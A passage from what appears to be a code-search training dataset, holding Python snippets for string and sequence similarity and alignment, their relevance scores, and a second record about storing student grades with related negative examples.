images partial_transforms basically: all\n # partial transformations array\n partial_transforms = []\n\n self._logger.debug(\"Generating similarity measure warppers.\")\n for moving_slice in self.options.slice_range:\n # Get all fixed images to which given moving slice will be aligned:\n tpair = list(flatten(self._get_slice_pair(moving_slice)))\n\n # Append partial transformations for given moving slice to the\n # global partial transformations array\n partial_transforms.append(tpair)\n\n # Generate wrapper for measuring similarity for a given partial\n # transformation.\n for mdx, fdx in tpair:\n commands.append(get_wrapper(fdx, mdx))\n\n # Execute and commands and workflow the similarity measurements.\n stdout, stderr = self.execute(commands)\n simmilarity = map(lambda x: float(x.strip()),\n stdout.strip().split(\"\\n\"))\n simmilarity = dict(zip(flatten(partial_transforms), simmilarity))\n\n self._logger.debug(\"Generating graph edges.\")\n graph_connections = []\n\n # Lambda defines slice skipping is preffered (lower l), or reluctant\n # to slice skipping (higher)\n l = self.options.graphEdgeLambda\n\n for (mdx, fdx), s in simmilarity.iteritems():\n w = (1.0 + s) * abs(mdx - fdx) * (1.0 + l) ** (abs(mdx - fdx))\n graph_connections.append((fdx, mdx, w))\n\n self._logger.info(\"Creating a graph based on image similarities.\")\n # Generate the graph basen on the weight of the edges\n self.G = nx.DiGraph()\n self.G.add_weighted_edges_from(graph_connections)\n\n self._logger.debug(\"Saving the graph to a file.\")\n # Save the edges for some further analysis.\n nx.write_weighted_edgelist(self.G,\n self.f['graph_edges'](sign=self.signature))\n\n # Also, save the individual similarity metrics:\n simm_fh = open(self.f['similarity'](sign=self.signature), 'w')\n for (mdx, fdx), s in sorted(simmilarity.iteritems()):\n simm_fh.write(\"%d %d %f\\n\" % (mdx, fdx, s))\n simm_fh.close()", "def scientific_match_ratio(str1, str2, keywords):\n\n # Get rid of the numbers\n str1_numberless = remove_numbers(str1)\n str2_numberless = remove_numbers(str2)\n\n # Get the keywords and whatever remains after removing the keywords\n str1_keywords, str1_remainder = get_common_words_in_description(str1_numberless, keywords)\n str2_keywords, str2_remainder = get_common_words_in_description(str2_numberless, keywords)\n\n remainder_dist = string_num_matches(str1_remainder, str2_remainder)\n common_keywords = str1_keywords.intersection(str2_keywords)\n\n common_keyword_total_len = 0\n for common_kword in common_keywords:\n common_keyword_total_len += len(common_kword)\n\n return (remainder_dist + common_keyword_total_len) * 1.0 / max(len(str1_numberless), len(str2_numberless))", "def test_align():\n target = ('TAAATAAATATCTGGTGTTTGAGGCAAAAAGGCAGACTTAAATTCTAAATCACACCTGTGCTT'\n 'CCAGCACTACCTTCAAGCGCAGGTTCGAGCCAGTCAGGCAGGGTACATAAGAGTCCATTGTGC'\n 'CTGTATTATTTTGAGCAATGGCTAAAGTACCTTCACCCTTGCTCACTGCTCCCCCACTTCCTC'\n 'AAGTCTCATCGTGTTTTTTTTAGAGCTAGTTTCTTAGTCTCATTAGGCTTCAGTCACCAT')\n query = ('TCTGGTGTTTGAGGCAAAAAGGCAGACTTAAATTCTAAATCACACCTGTGCTTCCAGCACTACC'\n 'TTCAAGCGCAGGTTCGAGCCAGTCAGGACTGCTCCCCCACTTCCTCAAGTCTCATCGTGTTTTT'\n 'TTTAGAGCTAGTTTCTTAGTCTCATTAGGCTTCAGTCACCATCATTTCTTATAGGAATACCA')\n assert kevlar.align(target, query) == ('10D91M69D79M20I', 155)", "def compute_alignment_matrix(seq_x,seq_y,scoring_matrix,global_flag):\n \n rows = len(seq_x)\n cols = len(seq_y)\n #if sequences are empty return [[0]]\n if rows == 0 and cols == 0:\n return [[0]]\n \n #initialize of alignment matrix and other variables\n alignment_matrix = [[ 0 for col in range(cols+1)] for row in range(rows+1)]\n value = 0\n \n for row in range(rows+1):\n for col in range(cols+1):\n #for every entry its value is computed \n if row == 0 and col == 0:\n #entry [0,0]\n alignment_matrix[row][col] = 0\n elif row == 0:\n #entry [0,j] is computed based on values [0,j-1] and score of (\"-\" and seq_y[j]) \n value = alignment_matrix[row][col-1] + scoring_matrix[\"-\"][seq_y[col-1]]\n elif col == 0:\n #entry [i,0] is computed based on values [i-1,0] and score of (seq_x[i] and \"-\")\n value = alignment_matrix[row-1][col] + scoring_matrix[seq_x[row-1]][\"-\"]\n else:\n #entry [i,j] is computed based of [i-1,j-1],[i,j-1],[i-1,j] as maximum of values\n val1 = alignment_matrix[row-1][col-1] + scoring_matrix[seq_x[row-1]][seq_y[col-1]]\n val2 = alignment_matrix[row-1][col] + scoring_matrix[seq_x[row-1]][\"-\"]\n val3 = alignment_matrix[row][col-1] + scoring_matrix[\"-\"][seq_y[col-1]]\n\n value = max(val1,val2,val3)\n \n if not global_flag:\n #for local alignment negative score is replaced with 0\n value = max(value,0)\n \n alignment_matrix[row][col] = value \n\n return alignment_matrix", "def doc_doc_similarity(matrix_a, matrix_b):\n assert matrix_a.shape[1] == matrix_b.shape[0], \"Mismatched shape between matrix A and matrix B\"\n numerator = np.dot(matrix_a, matrix_b)\n assert numerator.shape == (matrix_a.shape[0], matrix_b.shape[1]), numerator.shape\n denominator = np.sqrt(np.sum(matrix_a ** 2, axis=1))[:, np.newaxis] * np.sqrt(\n np.sum(matrix_b.T ** 2, axis=1))[:, np.newaxis].T\n assert (denominator > 0).all(), \"Denominator is zero {}\".format(denominator)\n similarity_matrix = np.multiply(numerator, 1 / denominator)\n return similarity_matrix", "def damerau_levenshtein_distance(comp_sec):\n s1 = comp_sec['log_trace']\n s2 = comp_sec['sim_trace']\n p1 = comp_sec['proc_log_trace']\n p2 = comp_sec['proc_sim_trace']\n w1 = comp_sec['wait_log_trace']\n w2 = comp_sec['wait_sim_trace']\n d = {}\n lenstr1 = len(s1)\n lenstr2 = len(s2)\n for i in range(-1,lenstr1+1):\n d[(i,-1)] = i+1\n for j in range(-1,lenstr2+1):\n d[(-1,j)] = j+1\n for i in range(0, lenstr1):\n for j in range(0, lenstr2):\n if s1[i] == s2[j]:\n t1 = p1[i] + w1[i]\n if t1 > 0:\n b1 = (p1[i]/t1)\n b2 = (w1[i]/t1)\n cost = (b1*abs(p2[j]-p1[i])) + (b2*abs(w2[j]-w1[i]))\n else:\n cost = 0\n else:\n cost = 1\n d[(i,j)] = min(\n d[(i-1,j)] + 1, # deletion\n d[(i,j-1)] + 1, # insertion\n d[(i-1,j-1)] + cost, # substitution\n )\n if i and j and s1[i]==s2[j-1] and s1[i-1] == s2[j]:\n d[(i,j)] = min (d[(i,j)], d[i-2,j-2] + cost) # transposition\n return d[lenstr1-1,lenstr2-1]", "def evaluate_similarity(kv: KeyedVectors, X, y):\n mean_vector = np.mean(kv.vectors, axis=0, keepdims=True)\n missing_words = np.sum(np.isin(X, kv.index2word, invert=True))\n if missing_words > 0:\n logging.warning(\"Missing {} words. Will replace them with mean vector\".format(missing_words))\n get = np.vectorize(gensim_helper.get_vector, signature='(),(),(m)->(m)')\n timer = mytimer.Timer(\"getting vectors for words\")\n wv_x = get(X, kv, mean_vector)\n timer.stop()\n a = wv_x[:, 0]\n b = wv_x[:, 1]\n # timer = mytimer.Timer()\n # a = np_helper.normalize_over_cols_2d(a)\n # b = np_helper.normalize_over_cols_2d(b)\n # scores = np.diag(np.matmul(a, b.T))\n # timer.stop()\n # print(scores.shape)\n #\n # A = np.vstack(kv.get(word, mean_vector) for word in X[:, 0])\n # B = np.vstack(kv.get(word, mean_vector) for word in X[:, 1])\n timer = mytimer.Timer()\n scores = np.array([v1.dot(v2.T) / (np.linalg.norm(v1) * np.linalg.norm(v2)) for v1, v2 in zip(a, b)])\n timer.stop()\n # print(scores.shape)\n return scipy.stats.spearmanr(scores, y)", "def alignment(gram1, gram2):\n # BUG: this loss function causes abnormal optimization behaviors, see\n # comments in past commits\n\n alignment = frobenius_inner_prod(gram1, gram2) /\\\n m.sqrt(frobenius_inner_prod(gram1, gram1) *\n frobenius_inner_prod(gram2, gram2))\n return alignment", "def question7(seq_x, seq_y):\n \n diag_score = 2\n off_diag_score = 1\n dash_score = 0\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n score_matrix = student.build_scoring_matrix(alphabet, diag_score, off_diag_score, dash_score)\n \n align_matrix = student.compute_alignment_matrix(seq_x, seq_y, score_matrix, True)\n score, align_x, align_y = student.compute_global_alignment(seq_x, seq_y, score_matrix, align_matrix)\n \n edit_distance = len(seq_x) + len(seq_y) - score\n \n print \"Edit distance: \" + str(edit_distance)\n print align_x\n print align_y", "def find_similars(self, test_set):\n\n tfidf = TfidfVectorizer(lowercase=False, sublinear_tf=True)\n tfidf_matrix = tfidf.fit_transform(self.train_str)\n\n # Calling only transform on test so that idf calculated on train data\n test_str = [' '.join(q.title) for q in test_set]\n test_tfidf = tfidf.transform(test_str)\n\n simis = self.calculate_similarity(tfidf_matrix, test_tfidf)\n return simis", "def compute_local_alignment(seq_x,seq_y,scoring_matrix,alignment_matrix):\n best_score = 0\n len_m, len_n = len(seq_x), len(seq_y)\n best_i = 0\n best_j = 0\n x_ret, y_ret = '', ''\n for idx_i in range(len_m+1):\n for idx_j in range(len_n+1):\n if alignment_matrix[idx_i][idx_j] > best_score:\n best_score = alignment_matrix[idx_i][idx_j]\n best_i = idx_i\n best_j = idx_j\n idx_i = best_i\n idx_j = best_j\n while idx_i != 0 and idx_j != 0:\n if alignment_matrix[idx_i][idx_j] == 0:\n return (best_score, x_ret, y_ret)\n if alignment_matrix[idx_i][idx_j] == (alignment_matrix[idx_i-1][idx_j-1] +\n scoring_matrix[seq_x[idx_i-1]][seq_y[idx_j-1]]):\n # score from diagnoal cell\n x_ret = (seq_x[idx_i-1]) + x_ret\n y_ret = (seq_y[idx_j-1]) + y_ret\n idx_i -= 1\n idx_j -= 1\n elif alignment_matrix[idx_i][idx_j] == (alignment_matrix[idx_i-1][idx_j] +\n scoring_matrix[seq_x[idx_i-1]]['-']):\n # score from above cell\n x_ret = (seq_x[idx_i - 1]) + x_ret\n y_ret = ('-') + y_ret\n idx_i -= 1\n else:\n # score from left cell\n x_ret = ('-') + x_ret\n y_ret = (seq_y[idx_j - 1]) + y_ret\n idx_j -= 1\n while idx_i != 0:\n if alignment_matrix[idx_i][idx_j] == 0:\n return (best_score, x_ret, y_ret)\n\n # idx_j = 0, move upward along first column\n x_ret = (seq_x[idx_i - 1]) + x_ret\n y_ret = ('-') + y_ret\n idx_i -= 1\n while idx_j != 0:\n if alignment_matrix[idx_i][idx_j] == 0:\n return (best_score, x_ret, y_ret)\n\n # idx_i = 0, move left along first row\n x_ret = ('-') + x_ret\n y_ret = (seq_y[idx_j - 1]) + y_ret\n idx_j -= 1\n return (best_score, x_ret, y_ret)", "def similarity(a, b):\n distance = Levenshtein.distance(a, b)\n return 1 - (distance / max((len(a), len(b))))", "def score():\n\n # Read files\n s1 = request.form.get(\"string1\")\n s2 = request.form.get(\"string2\")\n if not s1 or not s2:\n abort(400, \"missing strings\")\n\n # Score files\n matrix = distances(s1, s2)\n\n # Extract operations from table\n operations = []\n i, j = len(s1), len(s2)\n while True:\n _, operation = matrix[i][j]\n if not operation:\n break\n if operation == Operation.INSERTED:\n j -= 1\n elif operation == Operation.DELETED:\n i -= 1\n else:\n i -= 1\n j -= 1\n operations.append(operation)\n operations.reverse()\n\n # Maintain list of intermediate strings, operation, and descriptions\n transitions = [(s1, None, None)]\n i = 0\n\n # Apply each operation\n prev = s1\n for operation in operations:\n\n # Update string and description of operation\n if operation == Operation.INSERTED:\n s = (prev[:i], s2[i], prev[i:])\n description = f\"inserted '{s2[i]}'\"\n prev = prev[:i] + s2[i] + prev[i:]\n i += 1\n elif operation == Operation.DELETED:\n s = (prev[:i], prev[i], prev[i + 1:])\n description = f\"deleted '{prev[i]}'\"\n prev = prev[:i] + prev[i + 1:]\n elif prev[i] != s2[i]:\n s = (prev[:i], s2[i], prev[i + 1:])\n description = f\"substituted '{prev[i]}' with '{s2[i]}'\"\n prev = prev[:i] + s2[i] + prev[i + 1:]\n i += 1\n else:\n i += 1\n continue\n transitions.append((s, str(operation), description))\n transitions.append((s2, None, None))\n\n # Output comparison\n return render_template(\"score.html\", matrix=matrix, s1=s1, s2=s2, operations=transitions)", "def sentence_similarity_asym(sentence1, sentence2):\n # Tokenize and tag\n sentence1 = pos_tag(word_tokenize(sentence1))\n sentence2 = pos_tag(word_tokenize(sentence2))\n \n # Get the synsets for the tagged words\n synsets1 = [tagged_to_synset(*tagged_word) for tagged_word in sentence1]\n synsets2 = [tagged_to_synset(*tagged_word) for tagged_word in sentence2]\n \n # Filter out the Nones\n synsets1 = [ss for ss in synsets1 if ss]\n synsets2 = [ss for ss in synsets2 if ss]\n \n score, count = 0.0, 0\n\n # For each word in the first sentence\n for synset in synsets1:\n # Get the similarity value of the most similar word in the other sentence\n pathsim = [synset.path_similarity(ss) for ss in synsets2]\n if len(pathsim) == 0:\n #print sentence1, sentence2\n pathsim = [0]\n best_score = max(pathsim)\n \n # Check that the similarity could have been computed\n if best_score is not None:\n score += best_score\n count += 1\n\n if count == 0:\n return 0\n # Average the values\n score /= count\n return score", "def get_alphabet_similarity_matrix(self):\n distance_matrix = numpy.zeros((len(self.alphabet), len(self.alphabet)))\n numpy.fill_diagonal(distance_matrix, 0)\n for index_one, descriptor_one in enumerate(self.descriptors):\n for index_two, descriptor_two in enumerate(self.descriptors):\n distance = descriptor_one - descriptor_two\n squared_distance = numpy.dot(distance, distance)\n distance_matrix[index_one, index_two] = squared_distance\n distance_matrix /= 2. * (self.sigma_amino_acid ** 2)\n return numpy.exp(-distance_matrix)", "def content_similarity(self, movie1, movie2):\n v1, v2 = self.get_tfidf(movie1), self.get_tfidf(movie2)\n return self.cosine_similarity(v1, v2)", "def similarity(self, char1, char2, weights=(1.0, 0.0, 0.0), as_tree=False):\n\n assert char1 in self.char_dict\n assert char2 in self.char_dict\n shape_w, sound_w, freq_w = weights\n\n if char1 in self.char_dict and char2 in self.char_dict:\n\n shape_sim = self.shape_similarity(char1, char2, as_tree=as_tree)\n sound_sim = self.pronunciation_similarity(char1, char2)\n freq_sim = 1.0 - self.char_dict[char2] / len(self.char_dict)\n\n return shape_sim * shape_w + sound_sim * sound_w + freq_sim * freq_w\n else:\n return 0.0", "def do_global_alignment(sequences, matrix, penalty):\n seq1 = '-' + sequences[0].Sequence\n seq2 = '-' + sequences[1].Sequence\n\n # scoring matrix initializer\n scoring = global_setup(len(seq1), len(seq2), penalty)\n\n # fill scoring matrix\n aa_start = ord('A')\n for i in range(1, len(seq1)):\n aa_x = seq1[i]\n for j in range(1, len(seq2)):\n aa_y = seq2[j]\n xgap = scoring[i][j-1] - penalty\n ygap = scoring[i-1][j] - penalty\n match = scoring[i-1][j-1] + \\\n matrix[ord(aa_x) - aa_start][ord(aa_y) - aa_start]\n\n # store the max value of them all\n scoring[i].append(max([xgap, ygap, match]))\n\n # Perform traceback\n alignment = traceback(scoring, seq1, seq2, penalty, matrix)\n # Add the sequences to the scoring matrix for visualizing\n scoring = add_sequences_to_scoring(scoring, seq1, seq2)\n\n return alignment, scoring", "def text_similarity(self, text_1: str, text_2: str):\n txt1 = self._pre_process(text_1)\n txt2 = self._pre_process(text_2)\n\n sim = self.model.wmdistance(txt1, txt2)\n\n if sim == inf:\n sim = INF_SIMILIARITY\n return sim", "def get_subscore_pairwise(seqs1,seqs2, matrix=matrix, gap_s=gap_s, gap_e=gap_e):\n print type(seqs1)\n score=0\n terms=0\n for seq1 in seqs1:\n for seq2 in seqs2:\n score+=get_subscore(seq1, seq2, matrix, gap_s, gap_e)\n terms+=1.0\n\n return score/terms", "def __init__(self,alphabet=\"amino\",dist_function=\"simple\"):\n\n # initialize internal variables\n self.alphabet = alphabet\n self.dist_function = dist_function\n\n # decide on the alphabet\n if self.alphabet == \"amino\": \n self._alphabet_string = \"*ABCDEFGHIKLMNPQRSTVWXYZ\"\n else:\n raise ValueError(\"alphabet not recongized.\")\n \n if self.dist_function == \"simple\":\n self._dist_function_internal = 0\n elif self.dist_function == \"dl\":\n self._dist_function_internal = 1\n else:\n err = \"dist_function not recognized. should be 'simple' or 'dl' (Damerau-Levenshtein)\\n\"\n raise ValueError(err)\n \n self.alphabet_size = len(list(self._alphabet_string))\n\n enum_list = zip(self._alphabet_string,range(len(self._alphabet_string)))\n self._alphabet_dict = dict([(a, i) for a, i in enum_list])\n\n tmp_matrix = np.zeros((self.alphabet_size,self.alphabet_size),dtype=int)\n for k1 in self._alphabet_string:\n i = self._alphabet_dict[k1] \n for k2 in self._alphabet_string:\n j = self._alphabet_dict[k2]\n if k1 == k2:\n tmp_matrix[i,j] = 0\n else:\n tmp_matrix[i,j] = 1\n\n self.dist_matrix = tmp_matrix", "def synsets_similarity(s1, s2):\n lemmas_sentence_1, tagged_sentence_1 = lemmatize_sentence(s1.lower())\n lemmas_sentence_2, tagged_sentence_2 = lemmatize_sentence(s2.lower())\n\n # Disambiguate words and create list of sysnsets \n synsets_sentence_1 = []\n for (lemma, word_tag) in zip(lemmas_sentence_1, tagged_sentence_1):\n if lemma in stop_words:\n continue\n synset = lesk(lemmas_sentence_1, lemma, wordnet_pos_code(word_tag[1]))\n if synset is not None:\n synsets_sentence_1.append(synset)\n else:\n found = wordnet.synsets(lemma, wordnet_pos_code(word_tag[1]))\n if len(found) > 0:\n synsets_sentence_1.append(found[0]) \n #print(\"Warn: lemma [%s] returned no disambiguation...using synset : %s\" % (lemma, found[0])) \n\n synsets_sentence_2 = []\n for (lemma, word_tag) in zip(lemmas_sentence_2, tagged_sentence_2):\n if lemma in stop_words:\n continue\n synset = lesk(lemmas_sentence_2, lemma, wordnet_pos_code(word_tag[1]))\n if synset is not None:\n synsets_sentence_2.append(synset)\n else:\n found = wordnet.synsets(lemma, wordnet_pos_code(word_tag[1]))\n if len(found) > 0:\n synsets_sentence_2.append(found[0]) \n #print(\"Warn: lemma [%s] returned no disambiguation...using synset : %s\" % (lemma, found[0])) \n\n # Compute similarity\n if len(synsets_sentence_1) != 0 and len(synsets_sentence_2) != 0:\n similarity = 1 - jaccard_distance(set(synsets_sentence_1), set(synsets_sentence_2))\n return similarity\n else:\n return 0", "def levenshtein_distance(str1, str2):\n m = len(str1)\n n = len(str2)\n lensum = float(m + n)\n d = [] \n for i in range(m+1):\n d.append([i]) \n del d[0][0] \n for j in range(n+1):\n d[0].append(j) \n for j in range(1,n+1):\n for i in range(1,m+1):\n if str1[i-1] == str2[j-1]:\n d[i].insert(j,d[i-1][j-1]) \n else:\n minimum = min(d[i-1][j]+1, d[i][j-1]+1, d[i-1][j-1]+2) \n d[i].insert(j, minimum)\n ldist = d[-1][-1]\n ratio = (lensum - ldist)/lensum\n return {'distance':ldist, 'ratio':ratio}", "def sentence_similarity(sentence1, sentence2):\n sentence1 = sentence1.tags\n sentence2 = sentence2.tags\n \n synsets1 = [tagged_to_synset(*tagged_word) for tagged_word in sentence1]\n synsets2 = [tagged_to_synset(*tagged_word) for tagged_word in sentence2]\n \n synsets1 = [ss for ss in synsets1 if ss]\n synsets2 = [ss for ss in synsets2 if ss]\n \n score, count = 0.0, 0\n \n for synset in synsets1:\n \n li=[synset.path_similarity(ss) for ss in synsets2]\n m=0\n for i in range(len(li)):\n if li[i] is not None and m<li[i]:\n m=li[i]\n if m != 0:\n score += m\n count += 1\n\n if count is 0:\n score = 0\n else:\n score /= count\n return score" ]
[ "0.69739157", "0.647544", "0.6389687", "0.635343", "0.63365984", "0.6257071", "0.62165403", "0.6069753", "0.59501123", "0.5907441", "0.5907441", "0.589913", "0.5876702", "0.5853206", "0.5807996", "0.5804335", "0.5802121", "0.58003086", "0.5793083", "0.5780481", "0.57682025", "0.5763148", "0.57104427", "0.57008636", "0.57003653", "0.56970245", "0.56932807", "0.569313", "0.5681399", "0.5658224", "0.5644576", "0.56228507", "0.5613618", "0.56131804", "0.5606211", "0.55993193", "0.5595516", "0.5590502", "0.5583079", "0.5583079", "0.55773914", "0.5575561", "0.55706626", "0.5567197", "0.5560325", "0.55530894", "0.55462235", "0.5545121", "0.5537103", "0.5534957", "0.5521524", "0.5520564", "0.5515381", "0.5507127", "0.5503352", "0.54988664", "0.548892", "0.548795", "0.5484335", "0.547689", "0.5476755", "0.5473789", "0.5461926", "0.545223", "0.5450873", "0.5450295", "0.5447747", "0.5446465", "0.5444078", "0.5443455", "0.5428454", "0.5422874", "0.5418428", "0.54153836", "0.54069495", "0.54060656", "0.54050624", "0.54017323", "0.5399837", "0.53992873", "0.53962374", "0.5395216", "0.5375639", "0.53696185", "0.53563225", "0.53553677", "0.5348946", "0.534641", "0.53436357", "0.5338696", "0.5337474", "0.5333936", "0.5327961", "0.5324666", "0.53246075", "0.53046036", "0.5298913", "0.52972853", "0.52882254", "0.5283517" ]
0.6120387
7
Store the names and grades of school students.
def __init__(self): self.students = {}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_student(self, name: str, grade: int) -> None:\n school_grade = self.students.setdefault(grade, [])\n school_grade.append(name)\n school_grade.sort()", "def __init__(self):\n self.students = []\n self.grades = {}\n self.isSorted = True", "def add_student():\n\n\tprint('You must enter the student as is:\\n'\n\t\t\"'First name', 'middle name', 'Last name', 'major', 'major', 'gpa', id_number, 'minor'\"\n\t\t\" 'minor' graduation year, advisor number\\n For example: 'Kyle', 'Jacob', 'Ranney', 'Insurance'\"\n\t\t\", 'Chemistry', 3.0, 93988, 'Biology', 'NULL', 2016, 2234\\n\")\n\t# use sql insert statement\n\t# become familiar with this!\t", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def __init__(self, first_name, last_name, address):\n\n self.first_name = first_name\n self.last_name = last_name\n self.address = address\n\n # Creates dictionary for each student with the label & info.\n\n self.info = {\n 'first name': self.first_name,\n 'last name': self.last_name,\n 'address': self.address,\n }", "def __init__(self):\n self.students = []\n self.grades = {}\n self.is_sorted = True", "def students_data():\n\n return [\n {'name': 'Alexey', 'rate': 2, 'course': 'Python'},\n {'name': 'Vali', 'rate': 5, 'course': 'Java'},\n {'name': 'Olga', 'rate': 4, 'course': 'Python'},\n {'name': 'Frank', 'rate': 5, 'course': 'Python'},\n {'name': 'Masha', 'rate': 3, 'course': 'Java'},\n {'name': 'Vasily', 'rate': 2, 'course': 'Java'},\n {'name': 'Daria', 'rate': 3, 'course': 'Python'},\n {'name': 'Nickname', 'rate': 4, 'course': 'Python'},\n {'name': 'Fort', 'rate': 3, 'course': 'Java'},\n {'name': 'Lama', 'rate': 4, 'course': 'Java'},\n {'name': 'Pop', 'rate': 2, 'course': 'Python'},\n {'name': 'Sort', 'rate': 3, 'course': 'Python'},\n {'name': 'Elya', 'rate': 5, 'course': 'Java'},\n {'name': 'Tolik', 'rate': 4, 'course': 'Python'},\n ]", "def __init__(self):\n self.students = [] # List of Student objects.\n self.grades = {} # Dictionary to map IDNumber -> list of grades.\n self.isSorted = True # True if self.students is sorted.", "def __init__(self, name, surname):\n\t\t\n\t\tself.grades = {}\n\t\tself.attendance = 0\n\t\t\n\t\tif not (isinstance(name, str) and isinstance(surname, str)):\n\t\t\tname, surname = \"None\", \"None\"\n\t\tself.name, self.surname = name, surname", "def __init__(self):\n self.students=[]\n self.grades={}\n self.isSorted=True", "def __init__(self): \r\n self.students = [] #list of students\r\n self.grades = {} #id Num -> list of grades\r\n self.isSorted = True", "def make_gradebook(roster, grades, sub_info):\n gradebook = []\n for student in roster.keys():\n s = {}\n # fill student file with evaluation grades\n for day, score in zip(sub_info.keys(), grades):\n s[str(day)] = score[student]\n s['total'] = sum(s.values())\n s['username'] = student\n gradebook.append(s)\n return gradebook", "def update_course_info(self, grades_file_info):\n grades_file = os.path.join(self.path, \"grades.txt\")\n sep, header = grades_file_info\n try:\n for info in file_reading_gen(grades_file, 4, sep, header):\n # StudentID | Course | Grade | InstructorID\n student_id = info[0]\n course_code = info[1]\n grade = info[2]\n instructor_id = info[3]\n\n if student_id not in self.students:\n raise KeyError(\"Student with student id {} does not exists in students.txt\".format(student_id))\n if instructor_id not in self.instructors:\n raise KeyError(\"Instructor with instructor id {} does not exists in instructors.txt\".format(instructor_id))\n\n student = self.students[student_id]\n instructor = self.instructors[instructor_id]\n\n student.courses_completed.add(course_code)\n student.grades[course_code] = grade\n\n instructor.courses_taught.add(course_code)\n instructor.student_count[course_code] += 1\n except ValueError:\n raise ValueError(\"Invalid data in grades.txt\")\n except FileNotFoundError as e:\n print('Missing grades.txt.\\n' + str(e))", "def add_student(self, student):\n if student in self.students:\n raise ValueError('Duplicate Student.')\n self.students.append(student)\n self.grades[student.id] = []\n self.is_sorted = False", "def add_grades(self, subject_name, grade_list, attendance=True): \n\t\n\t\tif (isinstance(subject_name, str) and isinstance(grade_list, list)):\n\t\t\tfor grade in grade_list:\n\t\t\t\tself.grades.setdefault(subject_name, []).append(grade)\n\t\t\tself.attendance += 1 if attendance else 0", "def __init__(self, name, skill):\n \n super(Student, self).__init__(name)\n self.grades = []\n self.skill = skill", "def addStudent(self, student):\n if student in self.students:\n raise ValueError(\"Duplicate Student\")\n self.students.append(student)\n self.grades[student.getIDNumber()] = []\n self.isSorted = False", "def add_student(user_inputs):\r\n no_space = (remove_space(user_inputs))\r\n student_tuple = student_info._make(no_space.split(\",\"))\r\n StudentRoster.append(student_tuple)", "def add_student(self, student: 'Student') -> None:\n # Add HOUSEHOLD attributes to the schools' composition\n self.total += 1\n self.composition += student.household.attributes\n self.students[student.idx] = student\n self.has_space = (self.total < self.capacity)", "def _create_students(self):\n def mktime(str_date):\n return time.mktime(time.strptime(\n str_date, CountSkillCompletion.DATE_FORMAT))\n self.day1 = '2015-01-01'\n self.day2 = '2015-01-02'\n self.day3 = '2015-01-03'\n self.day4 = '2015-01-04'\n c = SkillCompletionTracker.COMPLETED\n p = SkillCompletionTracker.IN_PROGRESS\n # progress string for students\n students_progress = [\n {self.skill1.id : {c: mktime(self.day2), p: mktime(self.day1)},\n self.skill2.id : {c: mktime(self.day4), p: mktime(self.day1)}},\n {self.skill1.id : {c: mktime(self.day2), p: mktime(self.day2)},\n self.skill2.id : {p: mktime(self.day1)}},\n {self.skill1.id : {c: mktime(self.day1)}},\n {} # No progress\n ]\n for index, progress in enumerate(students_progress):\n student = models.Student(user_id=str(index))\n student.put()\n comp = models.StudentPropertyEntity.create(\n student=student,\n property_name=SkillCompletionTracker.PROPERTY_KEY)\n comp.value = transforms.dumps(progress)\n comp.put()", "def add_students() -> None:\r\n faculties = [\"Computer Science\", \"Performing Arts\", \"Engineering\", \"Economics\"]\r\n for faculty in faculties:\r\n for _ in range(50):\r\n create_student(faculty)", "def save_grades(self):\r\n try:\r\n try:\r\n self.grades.append(int(app.entry1.get()))\r\n self.grades.append(int(app.entry2.get()))\r\n self.grades.append(int(app.entry3.get()))\r\n self.grades.append(int(app.entry4.get()))\r\n self.grades.append(int(app.entry5.get()))\r\n except:\r\n app.info.configure(text='INFO: Warning, The Type of the Grade is incorrect.')\r\n # If the user pressed on 'Save Grades' with an entry value other than 'int', 'Info' Label shows the message:\r\n # \"INFO: Warning, The Type of the Grade is incorrect.\"\r\n number=5\r\n for index in range(len(self.grades)):\r\n open_data.student[open_data.name][number] = self.grades[index]\r\n number += 1\r\n self.grades=[]\r\n open_data.show_data()\r\n except AttributeError:\r\n if len(app.tree.get_children()) == 0:\r\n app.info.configure(text=\"INFO: Please Load the Files First.\", font=('', '7'))\r\n # If the user pressed on the treeview before loading the file, 'Info' Label shows the message:\r\n # 'INFO: Please Load The Files First.'\r\n except:\r\n app.info.configure(text=\"INFO: Warning, The Type of the Grade is incorrect.\", font=('', '7'))\r\n # If the user enters invalid type, it will give that warning.\r", "def __ui_grade_student(self):\n student_id = input(\"Give student ID: \")\n discipline_name = input(\"Give discipline discipline_name: \")\n\n try:\n grade_value = input(\"Give grade: \")\n if not self.__student_controller.student_has_discipline(student_id, discipline_name):\n print(\"The student isn't enrolled at the given discipline!\")\n return\n self.__grade_controller.add_grade(\n student_id,\n self.__discipline_controller.get_id_by_name(discipline_name),\n grade_value\n )\n print(\"Grade successful! \\n\")\n\n except GradeException as ge:\n print(ge)\n return\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return\n except ValueError as ve:\n print(ve)\n return", "def create_local_school():\n students = Student.create_by_csv(\"data/students.csv\")\n mentors = Mentor.create_by_csv(\"data/mentors.csv\")\n return students, mentors", "def students(self):\n\t\treturn self.grade_set.all().distinct()", "def add_student_data(connection,fname,lname,class_n,marks):\r\n with connection:\r\n connection.execute(INSERT_STUDENT,(fname,lname,class_n,marks))", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n title_grade_list = hackbright.get_grades_by_github(github)\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n title_grade_list=title_grade_list)\n\n return html", "def main():\n given_scores = []\n num_grades = int(raw_input())\n for i in xrange(num_grades):\n given_scores.append(int(raw_input()))\n for score in grading_students(given_scores):\n print score", "def get_grade_by_student(first_name):\n\n QUERY = \"\"\"\n SELECT g.project_title, g.grade \n FROM Students AS s JOIN Grades AS g \n ON s.github = g.student_github\n WHERE s.first_name = ?\n \"\"\"\n\n db_cursor.execute(QUERY, (first_name,))\n row = db_cursor.fetchall()\n \n if row != []:\n for project in row:\n print 'Grade for %s: %s' %(project[0], project[1])\n else:\n print 'Please try again and enter a FIRST NAME'", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n grades = hackbright.get_grades_by_github(github)\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n grades=grades)\n\n return html", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n # a list of (project_title, grade) for a given student\n titles_grades = hackbright.get_grades_by_github(github)\n\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n titles_grades=titles_grades)\n\n return html", "def 